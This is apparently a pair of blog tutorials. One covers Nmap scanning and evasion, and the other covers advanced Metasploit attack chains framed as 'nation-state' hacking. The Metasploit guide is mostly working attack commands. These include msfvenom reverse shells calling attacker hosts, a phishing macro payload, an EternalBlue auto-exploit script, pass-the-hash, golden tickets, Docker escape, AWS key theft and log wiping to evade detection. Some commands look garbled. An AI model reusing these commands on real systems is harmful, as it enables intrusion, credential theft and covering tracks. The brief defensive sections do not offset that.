Nmap Mastery - Basic to Pro (Hack like Pro)

 

Nmap: From Basic to Pro – Scan Like a Pro

Introduction

Nmap (Network Mapper) is the most powerful open-source network scanning tool, used by penetration testers, hackers, and cybersecurity professionals for host discovery, port scanning, vulnerability detection, and network mapping.

This guide will take you from basic scanning techniques to advanced stealthy reconnaissance, mimicking the methods of nation-state hackers and red teams.

Table of Contents

  1. Basic Scanning Techniques

  2. Advanced Port Scanning

  3. Service & OS Detection

  4. Stealth & Evasion Techniques

  5. Vulnerability Scanning

  6. Scripting & Automation

  7. Real-World Attack Scenarios

  8. Defensive Countermeasures

1. Basic Scanning Techniques

1.1 Simple Ping Scan (Host Discovery)

bash
nmap -sn 192.168.1.0/24

  • -sn: Disables port scanning (only pings hosts).

  • Use case: Quickly find live hosts in a network.

1.2 Basic Port Scan

bash
nmap 192.168.1.100

  • Scans top 1,000 ports (TCP SYN scan by default).

  • Use case: Quick recon on a single target.

1.3 Scan Specific Ports

bash
nmap -p 80,443,22 192.168.1.100

  • -p: Specifies ports (comma-separated or ranges 1-100).

  • Use case: Check for common web/SSH services.

1.4 Aggressive Scan (Fast & Verbose)

bash
nmap -A 192.168.1.100

  • -A: Enables OS detection, version detection, script scanning, and traceroute.

  • Use case: Gather maximum info in one scan.

2. Advanced Port Scanning

2.1 TCP SYN Scan (Stealthy)

bash
nmap -sS 192.168.1.100

  • -sS: Half-open scan (never completes TCP handshake).

  • Use case: Avoid detection by basic firewalls.

2.2 UDP Scan (Slow but Critical)

bash
nmap -sU -p 53,161 192.168.1.100

  • -sU: Scans UDP ports (DNS, SNMP, DHCP).

  • Use case: Find DNS servers, IoT devices.

2.3 Comprehensive Scan (All Ports + Services)

bash
nmap -p- -sV -T4 192.168.1.100

  • -p-: Scan all 65,535 ports.

  • -sV: Probe service versions.

  • -T4: Aggressive timing (faster results).

2.4 Firewall Evasion (Fragmented Packets)

bash
nmap -f 192.168.1.100

  • -f: Splits packets into small fragments.

  • Use case: Bypass IDS/IPS.

3. Service & OS Detection

3.1 Detect OS Fingerprint

bash
nmap -O 192.168.1.100

  • -O: Guesses the target OS.

  • Use case: Identify Windows vs. Linux targets.

3.2 Detect Service Versions

bash
nmap -sV 192.168.1.100

  • -sV: Probes services (e.g., Apache 2.4.41).

  • Use case: Find outdated software for exploits.

3.3 Grab HTTP Headers (Web Servers)

bash
nmap --script http-headers -p 80,443 192.168.1.100

  • --script http-headers: Extracts server info (X-Powered-By, etc.).

4. Stealth & Evasion Techniques

4.1 Idle Scan (Zombie Scan)

bash
nmap -sI zombie_ip:port target_ip

  • -sI: Uses an idle host to mask your IP.

  • Use case: Stay anonymous while scanning.

4.2 Randomize Hosts & Delays

bash
nmap --randomize-hosts --scan-delay 5s 192.168.1.0/24

  • --randomize-hosts: Avoids sequential scanning.

  • --scan-delay: Adds delays to evade rate-based detection.

4.3 Decoy Scan (Fake IPs)

bash
nmap -D RND:5 192.168.1.100

  • -D RND:5: Generates 5 random decoy IPs.

  • Use case: Confuse SOC analysts.

5. Vulnerability Scanning

5.1 NSE (Nmap Scripting Engine)

bash
nmap --script vuln 192.168.1.100

  • --script vuln: Runs vulnerability checks (e.g., CVE-2021-4034).

5.2 SMB Vulnerabilities Check

bash
nmap --script smb-vuln* -p 445 192.168.1.100

  • Checks for EternalBlue, MS17-010, etc.

5.3 Heartbleed Detection

bash
nmap -p 443 --script ssl-heartbleed 192.168.1.100

6. Scripting & Automation

6.1 Save Scan Results

bash
nmap -oN scan.txt -oX scan.xml 192.168.1.100

  • -oN: Normal text output.

  • -oX: XML format (for tools like Metasploit).

6.2 Scan Multiple Targets from File

bash
nmap -iL targets.txt

  • -iL: Input list of IPs/hosts.

6.3 Automate with Bash

bash
for ip in $(cat ips.txt); do nmap -p 22,80,443 $ip; done

7. Real-World Attack Scenarios

Scenario 1: External Recon (Black-Box Testing)

bash
nmap -Pn -sS -p- -T4 --min-rate 1000 -oN full_scan.txt target.com

  • -Pn: Skip ping (assume host is up).

  • --min-rate 1000: Speed up scan (aggressive).

Scenario 2: Internal Pivoting

bash
nmap -sn 10.1.1.0/24          # Find live hosts  
nmap -A -p 22,80,443 10.1.1.5 # Probe services

8. Defensive Countermeasures

How Blue Teams Detect Nmap

  • SYN scans (Unusual half-open connections).

  • Rate-based detection (Too many probes in short time).

  • Nmap’s default probes (Unique TCP flags).

How to Evade Detection

✅ Use -T2 (slower scan) to avoid triggering alarms.
✅ Fragment packets (-f) to bypass IDS.
✅ Use decoys (-D) to hide your IP.

Conclusion

You’ve now mastered Nmap from basic scans to nation-state-level reconnaissance.

Next Steps:

  • Practice on HackTheBox & TryHackMe.

  • Learn Metasploit integration (db_nmap).

  • Explore custom NSE scripts for advanced attacks.

Discalimer: This Content is Only Education Purpose 

🚀 Happy Scanning! 🚀

by - No comments:
Tags:

The Ultimate Metasploit Mastery Guide Advance to Pro Part-2

 

Metasploit: From Advanced to Pro – Exploit Like a Nation-State Hacker

Introduction

You’ve mastered the basics of Metasploit—now it’s time to operate like a professional penetration tester or red teamer. This guide dives into advanced exploitation, evasion, automation, and real-world attack chains with detailed command breakdowns.

Table of Contents

  1. Advanced Exploit Customization

  2. Stealthy Payloads & Evasion

  3. Post-Exploitation Mastery

  4. Lateral Movement & Pivoting

  5. Automation & API Integration

  6. Real-World Attack Walkthroughs

  7. Defensive Countermeasures

1. Advanced Exploit Customization

Manual Exploit Tweaking

Sometimes, public exploits fail due to custom environments, patches, or mitigations. Here’s how to adapt them:

Example: Modifying a Public Exploit

  1. Locate the exploit:

    bash
    locate multi/handler
cp /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb ~/custom_eternalblue.rb

  2. Edit the exploit (Adjust offsets, ROP chains, or shellcode):

    ruby
    # Change the target’s return address (x64)
'Targets' => [
  [ 'Windows 10 x64', { 'Ret' => 0x0000000140000000 } ]
]

  3. Reload Metasploit:

    bash
    reload_all
use exploit/custom_eternalblue

Key Exploit Options

bash
set VERBOSE true      # Debugging output
set CheckScrip true   # Verify target before attacking
set DisablePayloadHandler true  # Use external listener

2. Stealthy Payloads & Evasion

AV/EDR Bypass Techniques

1. Polymorphic Encoding

bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe -o payload_encoded.exe

  • -i 10: Iterate encoding 10 times.

  • -f exe: Output format.

2. Process Hollowing (Inject into Legit Process)

bash
use post/windows/manage/process_inject
set PAYLOAD windows/meterpreter/reverse_https
set PID 1234  # Target process (e.g., explorer.exe)
run

3. HTTPS Beaconing (C2 Obfuscation)

bash
set payload windows/x64/meterpreter/reverse_https
set LHOST secure.c2server.com
set LPORT 443
set HandlerSSLCert /path/to/fake_cert.pem

3. Post-Exploitation Mastery

Privilege Escalation (Windows)

1. Token Impersonation

bash
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

2. Kernel Exploits

bash
# Check vulnerability
run post/multi/recon/local_exploit_suggester

# Exploit (e.g., PrintNightmare)
use exploit/windows/local/cve_2021_1675_printspooler
set SESSION 1
exploit

Linux Privilege Escalation

bash
# SUID Finder
find / -perm -4000 2>/dev/null

# Exploit Dirty Pipe (CVE-2022-0847)
use exploit/linux/local/cve_2022_0847_dirtypipe
set SESSION 2
exploit

4. Lateral Movement & Pivoting

1. Pass-the-Hash (SMB)

bash
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.20
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  # NTLM hash
exploit

2. RDP Hijacking

bash
# Dump RDP sessions
run post/windows/gather/enum_rdp_sessions

# Hijack session (requires SYSTEM)
steal_token <PID>

3. Pivoting (Route Through Compromised Host)

bash
# Add route
run autoroute -s 10.1.1.0/24

# Scan internal network
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.1.1.1-254
run

5. Automation & API Integration

1. Metasploit Resource Scripts

bash
# auto_pwn.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.0/24
set THREADS 10
set PAYLOAD windows/x64/meterpreter/reverse_https
exploit -j

Run with:

bash
msfconsole -r auto_pwn.rc

2. Python Automation (MSFRPC)

python
import msfrpc
client = msfrpc.Msfrpc({'host': '127.0.0.1', 'port': 55553})
client.login('msf', 'password')
exploit = client.call('module.execute', ['exploit', 'windows/smb/psexec', {
    'RHOSTS': '192.168.1.10',
    'PAYLOAD': 'windows/meterpreter/reverse_tcp',
    'LHOST': '10.0.0.5'
}])

6. Real-World Attack Walkthroughs

Scenario 1: Phishing → Exploit → Domain Admin

  1. Send malicious Office macro:

    bash
    msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com -f vba -o macro.txt

  2. Gain initial access:

    bash
    use exploit/multi/handler
set payload windows/meterpreter/reverse_https
exploit

  3. Escalate to DA:

    bash
    load kiwi
dcsync_ntlm krbtgt
golden_ticket_create -d DOMAIN -u FAKEUSER -s S-1-5-21-...

Scenario 2: Web App → Docker Escape → Cloud Compromise

  1. Exploit vulnerable web app:

    bash
    use exploit/multi/http/struts2_code_exec
set RHOSTS app.target.com
exploit

  2. Break out of container:

    bash
    checkcontainer  # Check if in Docker
run post/linux/escalate/docker_escape

  3. Steal AWS keys:

    bash
    cat /proc/self/environ | grep AWS_

7. Defensive Countermeasures

How Blue Teams Detect Metasploit

  • Network signatures: Meterpreter’s HTTP/S beaconing.

  • Process anomaliesmsfconsole child processes.

  • Log anomalies: Rapid SMB login attempts.

Evasion Checklist

✅ Use encrypted payloads (HTTPS, DNS tunneling).
✅ Avoid default Meterpreter (Customize C2 channels).
✅ Clear logsclearev + timestomp.

Conclusion

You’re now equipped with nation-state-level Metasploit techniques. Key takeaways:

  • Custom exploits bypass defenses.

  • Evasion is critical for red team ops.

  • Automation scales attacks.

What’s next?

  • Practice on Advanced HackTheBox machines.

  • Learn C2 frameworks (Cobalt Strike, Sliver).

  • Study real-world APT reports for tradecraft.

Discalimer: This Content is Only Education Purpose 

🚀 Time to go pro! 🚀

by - No comments:
Tags: ,
Subscribe to: Comments (Atom)